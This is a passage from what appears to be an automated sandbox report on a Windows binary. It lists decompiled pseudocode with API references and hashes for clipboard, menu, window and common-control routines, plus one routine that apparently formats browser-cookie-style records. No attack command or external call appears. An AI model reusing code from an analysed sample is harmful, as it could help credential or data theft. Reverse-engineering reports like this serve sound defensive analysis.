                                                                                                                                                      • SetPixel.GDI32(00000000,?,?,?), ref: 0040601B
                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 0040603B
                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 00406042
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ObjectPixel$Select$ColorCompatibleCreateDeleteHandleImageLoadModule
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2468767547-0
                                                                                                                                                      • Opcode ID: 1a7923fc47ade543c6afb8f7e3d9ec78faebe15cd473db001480de50e0d72165
                                                                                                                                                      • Instruction ID: 96ffd5419d12e5b7e39f9d209f068ed4cf2d1907ffa725acb483dd1c78e641ad
                                                                                                                                                      • Opcode Fuzzy Hash: 1a7923fc47ade543c6afb8f7e3d9ec78faebe15cd473db001480de50e0d72165
                                                                                                                                                      • Instruction Fuzzy Hash: A321F0B5D00219FBCB21ABE4DE889EEBFB9FF08751F104876F601B2152C7745A449BA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00405559(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                      				long _v8;
                                                                                                                                                      				void* _v12;
                                                                                                                                                      				long _v16;
                                                                                                                                                      				void* _t17;
                                                                                                                                                      				void* _t32;
                                                                                                                                                      				void* _t37;
                                                                                                                                                      				long _t39;
                                                                                                                                                      
                                                                                                                                                      				_v8 = _v8 & 0x00000000;
                                                                                                                                                      				EmptyClipboard();
                                                                                                                                                      				_t17 = E00405338(_a4);
                                                                                                                                                      				_v12 = _t17;
                                                                                                                                                      				if(_t17 == 0xffffffff) {
                                                                                                                                                      					_v8 = GetLastError();
                                                                                                                                                      				} else {
                                                                                                                                                      					_t39 = GetFileSize(_t17, 0);
                                                                                                                                                      					_t5 = _t39 + 2; // 0x2
                                                                                                                                                      					_t32 = GlobalAlloc(0x2000, _t5);
                                                                                                                                                      					if(_t32 == 0) {
                                                                                                                                                      						L4:
                                                                                                                                                      						_v8 = GetLastError();
                                                                                                                                                      					} else {
                                                                                                                                                      						_t37 = GlobalLock(_t32);
                                                                                                                                                      						if(ReadFile(_v12, _t37, _t39,  &_v16, 0) == 0) {
                                                                                                                                                      							goto L4;
                                                                                                                                                      						} else {
                                                                                                                                                      							 *(_t37 + (_t39 >> 1) * 2) =  *(_t37 + (_t39 >> 1) * 2) & 0x00000000;
                                                                                                                                                      							GlobalUnlock(_t32);
                                                                                                                                                      							SetClipboardData(0xd, _t32);
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					CloseHandle(_v12);
                                                                                                                                                      				}
                                                                                                                                                      				CloseClipboard();
                                                                                                                                                      				return _v8;
                                                                                                                                                      			}











                                                                                                                                                      APIs
                                                                                                                                                      • EmptyClipboard.USER32 ref: 00405563
                                                                                                                                                        • Part of subcall function 00405338: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,00403FF7,?,?,00000000,00403B9A,?), ref: 0040534A
                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00405580
                                                                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000002), ref: 00405591
                                                                                                                                                      • GlobalLock.KERNEL32 ref: 0040559E
                                                                                                                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 004055B1
                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004055C3
                                                                                                                                                      • SetClipboardData.USER32 ref: 004055CC
                                                                                                                                                      • GetLastError.KERNEL32 ref: 004055D4
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004055E0
                                                                                                                                                      • GetLastError.KERNEL32 ref: 004055EB
                                                                                                                                                      • CloseClipboard.USER32 ref: 004055F4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3604893535-0
                                                                                                                                                      • Opcode ID: 59ceb6b3a235d8f074aa04a98775147e6836de81911978fc41fe46ee66c441fd
                                                                                                                                                      • Instruction ID: 38fb76984466a98f40b20a1ffdead2548e4c0d81c76d76b6fa97ca59cfc580cd
                                                                                                                                                      • Opcode Fuzzy Hash: 59ceb6b3a235d8f074aa04a98775147e6836de81911978fc41fe46ee66c441fd
                                                                                                                                                      • Instruction Fuzzy Hash: 23114F76500605FBDB20ABB0EE4CA9F7BB8EB04351F104176F502F6691DB749909CB68
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 74%
                                                                                                                                                      			E0040228C(void* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                      				struct _SYSTEMTIME _v88;
                                                                                                                                                      				void* _v92;
                                                                                                                                                      				struct _FILETIME _v96;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				signed int _t29;
                                                                                                                                                      				signed int _t34;
                                                                                                                                                      				signed int _t39;
                                                                                                                                                      				char* _t44;
                                                                                                                                                      				void* _t56;
                                                                                                                                                      				signed int _t60;
                                                                                                                                                      				signed int _t64;
                                                                                                                                                      				signed int _t70;
                                                                                                                                                      				signed int _t77;
                                                                                                                                                      				long _t90;
                                                                                                                                                      				intOrPtr _t91;
                                                                                                                                                      				void* _t97;
                                                                                                                                                      				signed int _t98;
                                                                                                                                                      				signed int _t99;
                                                                                                                                                      
                                                                                                                                                      				_t97 = __esi;
                                                                                                                                                      				_t81 =  *((intOrPtr*)(__esi + 0x10));
                                                                                                                                                      				_t91 = _a4;
                                                                                                                                                      				_t29 = E00406306(0x412320,  *((intOrPtr*)(__esi + 0x10)));
                                                                                                                                                      				_t77 = 0x40f454;
                                                                                                                                                      				if(_t29 != 0) {
                                                                                                                                                      					_t77 = _t29;
                                                                                                                                                      				}
                                                                                                                                                      				_t99 = _t98 | 0xffffffff;
                                                                                                                                                      				_t106 =  *(_t97 + 0x40) & 0x00004000;
                                                                                                                                                      				if(( *(_t97 + 0x40) & 0x00004000) != 0) {
                                                                                                                                                      					E004063DD(_t99, _t81, _t91, _t106, ".");
                                                                                                                                                      				}
                                                                                                                                                      				E004063DD(_t99, _t81, _t91, _t106, _t77);
                                                                                                                                                      				_t78 = "\t";
                                                                                                                                                      				E004063DD(_t99, _t81, _t91, _t106, "\t");
                                                                                                                                                      				_t107 =  *(_t97 + 0x40) & 0x00004000;
                                                                                                                                                      				_t34 = _t99;
                                                                                                                                                      				if(( *(_t97 + 0x40) & 0x00004000) == 0) {
                                                                                                                                                      					_push(L"FALSE");
                                                                                                                                                      				} else {
                                                                                                                                                      					_push(L"TRUE");
                                                                                                                                                      				}
                                                                                                                                                      				E004063DD(_t34, _t81, _t91, _t107);
                                                                                                                                                      				E004063DD(_t99, _t81, _t91, _t107);
                                                                                                                                                      				_t82 =  *((intOrPtr*)(_t97 + 0x14));
                                                                                                                                                      				_t39 = E00406306(0x412320,  *((intOrPtr*)(_t97 + 0x14)));
                                                                                                                                                      				_t108 = _t39;
                                                                                                                                                      				if(_t39 == 0) {
                                                                                                                                                      					_t39 = 0x40f454;
                                                                                                                                                      				}
                                                                                                                                                      				E004063DD(_t99, _t82, _t91, _t108, _t39);
                                                                                                                                                      				E004063DD(_t99, _t82, _t91, _t108, _t78);
                                                                                                                                                      				_t109 =  *(_t97 + 0x40) & 0x00000001;
                                                                                                                                                      				_t44 = L"TRUE";
                                                                                                                                                      				if(( *(_t97 + 0x40) & 0x00000001) == 0) {
                                                                                                                                                      					_t44 = L"FALSE";
                                                                                                                                                      				}
                                                                                                                                                      				E004063DD(_t99, _t82, _t91, _t109, _t44);
                                                                                                                                                      				E004063DD(_t99, _t82, _t91, _t109, _t78);
                                                                                                                                                      				asm("stosd");
                                                                                                                                                      				asm("stosd");
                                                                                                                                                      				asm("stosd");
                                                                                                                                                      				asm("stosw");
                                                                                                                                                      				_v88.wYear = 0x7b2;
                                                                                                                                                      				_v88.wDay = 1;
                                                                                                                                                      				_v88.wMonth = 1;
                                                                                                                                                      				SystemTimeToFileTime( &_v88,  &_v96);
                                                                                                                                                      				_t90 = _v96.dwLowDateTime;
                                                                                                                                                      				asm("sbb ecx, edi");
                                                                                                                                                      				_t56 = E0040E380( *((intOrPtr*)(_t97 + 0x30)) - _t90,  *((intOrPtr*)(_t97 + 0x34)), 0x989680, 0);
                                                                                                                                                      				_push(_t90);
                                                                                                                                                      				_push(_t56);
                                                                                                                                                      				_push(L"%I64d");
                                                                                                                                                      				_push(0x1f);
                                                                                                                                                      				_push( &_v88);
                                                                                                                                                      				L0040DFD6();
                                                                                                                                                      				_t96 = _v20;
                                                                                                                                                      				_t60 = E004063DD( &_v88 | 0xffffffff,  *((intOrPtr*)(_t97 + 0x34)), _v20, _t109,  &_v88);
                                                                                                                                                      				_t80 = "\t";
                                                                                                                                                      				E004063DD(_t60 | 0xffffffff,  *((intOrPtr*)(_t97 + 0x34)), _v20, _t109, "\t");
                                                                                                                                                      				_t85 =  *((intOrPtr*)(_t97 + 0x18));
                                                                                                                                                      				_t64 = E00406306(0x412320,  *((intOrPtr*)(_t97 + 0x18)));
                                                                                                                                                      				_t110 = _t64;
                                                                                                                                                      				if(_t64 == 0) {
                                                                                                                                                      					_t64 = 0x40f454;
                                                                                                                                                      				}
                                                                                                                                                      				E004063DD(E004063DD(_t64 | 0xffffffff, _t85, _t96, _t110, _t64) | 0xffffffff, _t85, _t96, _t110, _t80);
                                                                                                                                                      				_t86 =  *((intOrPtr*)(_t97 + 0x1c));
                                                                                                                                                      				_t70 = E00406306(0x412320,  *((intOrPtr*)(_t97 + 0x1c)));
                                                                                                                                                      				_t111 = _t70;
                                                                                                                                                      				if(_t70 == 0) {
                                                                                                                                                      					_t70 = 0x40f454;
                                                                                                                                                      				}
                                                                                                                                                      				return E004063DD(E004063DD(_t70 | 0xffffffff, _t86, _t96, _t111, _t70) | 0xffffffff, _t86, _t96, E004063DD(_t70 | 0xffffffff, _t86, _t96, _t111, _t70) | 0xffffffff, L"\r\n");
                                                                                                                                                      			}























                                                                                                                                                      APIs
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(0040F608,0040F454,0040F608,TRUE,0040F608), ref: 0040236D
                                                                                                                                                      • __aulldiv.LIBCMT ref: 0040239D
                                                                                                                                                      • _snwprintf.MSVCRT ref: 004023B0
                                                                                                                                                        • Part of subcall function 004063DD: wcslen.MSVCRT ref: 004063F9
                                                                                                                                                        • Part of subcall function 004063DD: memcpy.MSVCRT ref: 0040641C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Time$FileSystem__aulldiv_snwprintfmemcpywcslen
                                                                                                                                                      • String ID: #A$ #A$ #A$%I64d$FALSE$TRUE
                                                                                                                                                      • API String ID: 1007903050-2074899967
                                                                                                                                                      • Opcode ID: b9360966ef7f6412c30b58f45b026677565554216b57faebb1f3e34bdffda112
                                                                                                                                                      • Instruction ID: 8e4ed6724c6830059bb234df0f7beb71b8df579462f7a4d2eaf4f2db12cb8827
                                                                                                                                                      • Opcode Fuzzy Hash: b9360966ef7f6412c30b58f45b026677565554216b57faebb1f3e34bdffda112
                                                                                                                                                      • Instruction Fuzzy Hash: 9041B5613002042BD260BE7A9D45A1B7299AF94318B014A3FBD66F76D3DBBCE81D4369
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 48%
                                                                                                                                                      			E0040699E(void* __ecx, void* __eflags, int _a4, struct tagMENUITEMINFOW _a8, intOrPtr _a12, int _a24, intOrPtr _a28, wchar_t* _a44, intOrPtr _a48, long _a56, void _a58, short _a8256, void _a8258) {
                                                                                                                                                      				wchar_t* _v0;
                                                                                                                                                      				int _v4;
                                                                                                                                                      				int _t39;
                                                                                                                                                      				wchar_t* _t49;
                                                                                                                                                      				void* _t51;
                                                                                                                                                      				int _t67;
                                                                                                                                                      				intOrPtr _t68;
                                                                                                                                                      				signed int _t70;
                                                                                                                                                      				signed int _t71;
                                                                                                                                                      
                                                                                                                                                      				_t59 = __ecx;
                                                                                                                                                      				_t71 = _t70 & 0xfffffff8;
                                                                                                                                                      				E0040E340(0x404c, __ecx);
                                                                                                                                                      				_t39 = GetMenuItemCount(_a8.cbSize);
                                                                                                                                                      				_a4 = _t39;
                                                                                                                                                      				_v4 = 0;
                                                                                                                                                      				if(_t39 <= 0) {
                                                                                                                                                      					L15:
                                                                                                                                                      					return _t39;
                                                                                                                                                      				} else {
                                                                                                                                                      					do {
                                                                                                                                                      						memset( &_a58, 0, 0x2000);
                                                                                                                                                      						_t71 = _t71 + 0xc;
                                                                                                                                                      						_a44 =  &_a56;
                                                                                                                                                      						_a8.cbSize = 0x30;
                                                                                                                                                      						_a12 = 0x36;
                                                                                                                                                      						_a48 = 0x1000;
                                                                                                                                                      						_a56 = 0;
                                                                                                                                                      						if(GetMenuItemInfoW(_a8.cbSize, _v4, 1,  &_a8) == 0) {
                                                                                                                                                      							goto L14;
                                                                                                                                                      						}
                                                                                                                                                      						if(_a56 == 0) {
                                                                                                                                                      							L12:
                                                                                                                                                      							_t80 = _a28;
                                                                                                                                                      							if(_a28 != 0) {
                                                                                                                                                      								_push(0);
                                                                                                                                                      								_push(_a28);
                                                                                                                                                      								_push(_a4);
                                                                                                                                                      								E0040699E(_t59, _t80);
                                                                                                                                                      								_t71 = _t71 + 0xc;
                                                                                                                                                      							}
                                                                                                                                                      							goto L14;
                                                                                                                                                      						}
                                                                                                                                                      						_t67 = _a24;
                                                                                                                                                      						_a8256 = 0;
                                                                                                                                                      						memset( &_a8258, 0, 0x2000);
                                                                                                                                                      						_t49 = wcschr( &_a56, 9);
                                                                                                                                                      						_t71 = _t71 + 0x14;
                                                                                                                                                      						_v0 = _t49;
                                                                                                                                                      						if(_a28 != 0) {
                                                                                                                                                      							if(_a12 == 0) {
                                                                                                                                                      								 *0x412c34 =  *0x412c34 + 1;
                                                                                                                                                      								_t68 =  *0x412c34; // 0x0
                                                                                                                                                      								_t67 = _t68 + 0x11558;
                                                                                                                                                      								__eflags = _t67;
                                                                                                                                                      							} else {
                                                                                                                                                      								_t67 = _v4 + 0x11171;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						_t51 = E00406D16(_t67,  &_a8256);
                                                                                                                                                      						_pop(_t59);
                                                                                                                                                      						if(_t51 != 0) {
                                                                                                                                                      							if(_v0 != 0) {
                                                                                                                                                      								wcscat( &_a8256, _v0);
                                                                                                                                                      								_pop(_t59);
                                                                                                                                                      							}
                                                                                                                                                      							ModifyMenuW(_a8, _v4, 0x400, _t67,  &_a8256);
                                                                                                                                                      						}
                                                                                                                                                      						goto L12;
                                                                                                                                                      						L14:
                                                                                                                                                      						_v4 = _v4 + 1;
                                                                                                                                                      						_t39 = _v4;
                                                                                                                                                      					} while (_t39 < _a4);
                                                                                                                                                      					goto L15;
                                                                                                                                                      				}
                                                                                                                                                      			}













                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                      • String ID: 0$6
                                                                                                                                                      • API String ID: 4066108131-3849865405
                                                                                                                                                      • Opcode ID: 89f899f7243dee98bcbd5a103440f16ff97d5f32f15a1ba4fc358b67112b384b
                                                                                                                                                      • Instruction ID: b215381df5749c23a569ed6f67112db3caf5a45f0159d48b34fa9b4edc30ae2f
                                                                                                                                                      • Opcode Fuzzy Hash: 89f899f7243dee98bcbd5a103440f16ff97d5f32f15a1ba4fc358b67112b384b
                                                                                                                                                      • Instruction Fuzzy Hash: D731AFB2508344AFCB209F91C84099BB7E8EF84314F04893EFA49A2291D775D914CF9A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 58%
                                                                                                                                                      			E00402754(void* __ecx) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				char _v12;
                                                                                                                                                      				struct HWND__* _t6;
                                                                                                                                                      				_Unknown_base(*)()* _t11;
                                                                                                                                                      				struct HWND__* _t15;
                                                                                                                                                      				void* _t20;
                                                                                                                                                      				struct HINSTANCE__* _t23;
                                                                                                                                                      
                                                                                                                                                      				_v12 = 8;
                                                                                                                                                      				_v8 = 0xff;
                                                                                                                                                      				_t15 = 0;
                                                                                                                                                      				_t20 = 0;
                                                                                                                                                      				_t23 = LoadLibraryW(L"comctl32.dll");
                                                                                                                                                      				if(_t23 == 0) {
                                                                                                                                                      					L5:
                                                                                                                                                      					__imp__#17();
                                                                                                                                                      					_t6 = 1;
                                                                                                                                                      					L6:
                                                                                                                                                      					if(_t6 != 0) {
                                                                                                                                                      						return 1;
                                                                                                                                                      					} else {
                                                                                                                                                      						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
                                                                                                                                                      						return 0;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
                                                                                                                                                      				if(_t11 != 0) {
                                                                                                                                                      					_t20 = 1;
                                                                                                                                                      					_t15 =  *_t11( &_v12);
                                                                                                                                                      				}
                                                                                                                                                      				FreeLibrary(_t23);
                                                                                                                                                      				if(_t20 == 0) {
                                                                                                                                                      					goto L5;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t6 = _t15;
                                                                                                                                                      					goto L6;
                                                                                                                                                      				}
                                                                                                                                                      			}











                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 00402773
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00402785
                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 00402799
                                                                                                                                                      • #17.COMCTL32(?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 004027A7
                                                                                                                                                      • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004027C4
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                      • API String ID: 2780580303-317687271
                                                                                                                                                      • Opcode ID: 8b95306214ac587ba0897fcd046ca2e4eeea29109f78b8f4090a977e67bd8f40
                                                                                                                                                      • Instruction ID: 71d6d288c8c0cbb2a230865f183c91b33313cb8a4c206b23d80a388f73b59e38
                                                                                                                                                      • Opcode Fuzzy Hash: 8b95306214ac587ba0897fcd046ca2e4eeea29109f78b8f4090a977e67bd8f40
                                                                                                                                                      • Instruction Fuzzy Hash: 0B01D1763612116BD3315BB49D8DB7F7AD8EB81759B10403AF502F36C0EAB8C90982AD
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                      			E00405B17(void* __edx, struct HWND__* _a4, signed int _a8) {
                                                                                                                                                      				struct HWND__* _v8;
                                                                                                                                                      				struct HWND__* _v12;
                                                                                                                                                      				struct tagRECT _v28;
                                                                                                                                                      				struct tagRECT _v44;
                                                                                                                                                      				int _t50;
                                                                                                                                                      				long _t61;
                                                                                                                                                      				struct HDC__* _t63;
                                                                                                                                                      				intOrPtr _t65;
                                                                                                                                                      				intOrPtr _t68;
                                                                                                                                                      				struct HWND__* _t71;
                                                                                                                                                      				intOrPtr _t72;
                                                                                                                                                      				void* _t73;
                                                                                                                                                      				int _t74;
                                                                                                                                                      				int _t80;
                                                                                                                                                      				int _t83;
                                                                                                                                                      
                                                                                                                                                      				_t73 = __edx;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v12 = 0;
                                                                                                                                                      				_t74 = GetSystemMetrics(0x11);
                                                                                                                                                      				_t80 = GetSystemMetrics(0x10);
                                                                                                                                                      				if(_t74 == 0 || _t80 == 0) {
                                                                                                                                                      					_t63 = GetDC(0);
                                                                                                                                                      					_t80 = GetDeviceCaps(_t63, 8);
                                                                                                                                                      					_t74 = GetDeviceCaps(_t63, 0xa);
                                                                                                                                                      					ReleaseDC(0, _t63);
                                                                                                                                                      				}
                                                                                                                                                      				GetWindowRect(_a4,  &_v44);
                                                                                                                                                      				if((_a8 & 0x00000004) != 0) {
                                                                                                                                                      					_t71 = GetParent(_a4);
                                                                                                                                                      					if(_t71 != 0) {
                                                                                                                                                      						_v28.left = _v28.left & 0x00000000;
                                                                                                                                                      						asm("stosd");
                                                                                                                                                      						asm("stosd");
                                                                                                                                                      						asm("stosd");
                                                                                                                                                      						GetWindowRect(_t71,  &_v28);
                                                                                                                                                      						_t61 = _v28.left;
                                                                                                                                                      						_t72 = _v28.top;
                                                                                                                                                      						_t80 = _v28.right - _t61 + 1;
                                                                                                                                                      						_t74 = _v28.bottom - _t72 + 1;
                                                                                                                                                      						_v8 = _t61;
                                                                                                                                                      						_v12 = _t72;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t65 = _v44.right;
                                                                                                                                                      				if((_a8 & 0x00000001) == 0) {
                                                                                                                                                      					asm("cdq");
                                                                                                                                                      					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t83 = 0;
                                                                                                                                                      				}
                                                                                                                                                      				_t68 = _v44.bottom;
                                                                                                                                                      				if((_a8 & 0x00000002) != 0) {
                                                                                                                                                      					L11:
                                                                                                                                                      					_t50 = 0;
                                                                                                                                                      					goto L12;
                                                                                                                                                      				} else {
                                                                                                                                                      					asm("cdq");
                                                                                                                                                      					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
                                                                                                                                                      					if(_t50 >= 0) {
                                                                                                                                                      						L12:
                                                                                                                                                      						if(_t83 < 0) {
                                                                                                                                                      							_t83 = 0;
                                                                                                                                                      						}
                                                                                                                                                      						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
                                                                                                                                                      					}
                                                                                                                                                      					goto L11;
                                                                                                                                                      				}
                                                                                                                                                      			}


















                                                                                                                                                      0x00405bde
                                                                                                                                                      0x00405bf3
                                                                                                                                                      0x00405bf3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405be0
                                                                                                                                                      0x00405be9
                                                                                                                                                      0x00405bee
                                                                                                                                                      0x00405bf1
                                                                                                                                                      0x00405bf5
                                                                                                                                                      0x00405bf7
                                                                                                                                                      0x00405bf9
                                                                                                                                                      0x00405bf9
                                                                                                                                                      0x00405c16
                                                                                                                                                      0x00405c16
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405bf1

                                                                                                                                                      APIs
                                                                                                                                                      • GetSystemMetrics.USER32 ref: 00405B30
                                                                                                                                                      • GetSystemMetrics.USER32 ref: 00405B36
                                                                                                                                                      • GetDC.USER32(00000000), ref: 00405B43
                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00405B54
                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00405B5B
                                                                                                                                                      • ReleaseDC.USER32 ref: 00405B62
                                                                                                                                                      • GetWindowRect.USER32 ref: 00405B75
                                                                                                                                                      • GetParent.USER32(?), ref: 00405B80
                                                                                                                                                      • GetWindowRect.USER32 ref: 00405B9D
                                                                                                                                                      • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00405C0C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2163313125-0
                                                                                                                                                      • Opcode ID: 62d34707e84acb0b8d4d630ad042eb52563104a98599b23053d4d9526d36ec3e
                                                                                                                                                      • Instruction ID: 16e951d772d83260d2b373081c0788c8dcba8c3ecadbacc9f3e1e8367de9e11c
                                                                                                                                                      • Opcode Fuzzy Hash: 62d34707e84acb0b8d4d630ad042eb52563104a98599b23053d4d9526d36ec3e
                                                                                                                                                      • Instruction Fuzzy Hash: F6316072900619AFDB10CFB8CD85AEEBBB8EB48314F054179E901F7290DA75BD458F94
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 98%
                                                                                                                                                      			E00401ED6(signed int __ecx, void* __edx, intOrPtr* _a4) {
                                                                                                                                                      				char _v516;
                                                                                                                                                      				char _v520;
                                                                                                                                                      				intOrPtr _v524;
                                                                                                                                                      				intOrPtr _v528;
                                                                                                                                                      				intOrPtr _v532;
                                                                                                                                                      				intOrPtr _v536;
                                                                                                                                                      				intOrPtr _v540;
                                                                                                                                                      				intOrPtr _v544;
                                                                                                                                                      				void _v546;
                                                                                                                                                      				char _v548;
                                                                                                                                                      				signed int _v556;
                                                                                                                                                      				signed int _v560;
                                                                                                                                                      				signed int _v564;
                                                                                                                                                      				signed int _v568;
                                                                                                                                                      				signed int _v572;
                                                                                                                                                      				intOrPtr _v576;
                                                                                                                                                      				int _v580;
                                                                                                                                                      				short _v582;
                                                                                                                                                      				void _v584;
                                                                                                                                                      				intOrPtr _v588;
                                                                                                                                                      				signed int _v592;
                                                                                                                                                      				signed int _v596;
                                                                                                                                                      				wchar_t* _v600;
                                                                                                                                                      				signed int _v604;
                                                                                                                                                      				intOrPtr _v624;
                                                                                                                                                      				char _v632;
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				signed int _t73;
                                                                                                                                                      				signed int _t74;
                                                                                                                                                      				signed int _t76;
                                                                                                                                                      				signed int _t97;
                                                                                                                                                      				signed int _t104;
                                                                                                                                                      				int _t124;
                                                                                                                                                      				intOrPtr _t126;
                                                                                                                                                      				signed int _t127;
                                                                                                                                                      				void* _t131;
                                                                                                                                                      				intOrPtr* _t151;
                                                                                                                                                      				signed int _t153;
                                                                                                                                                      				void* _t156;
                                                                                                                                                      				void* _t157;
                                                                                                                                                      
                                                                                                                                                      				_t134 = __ecx;
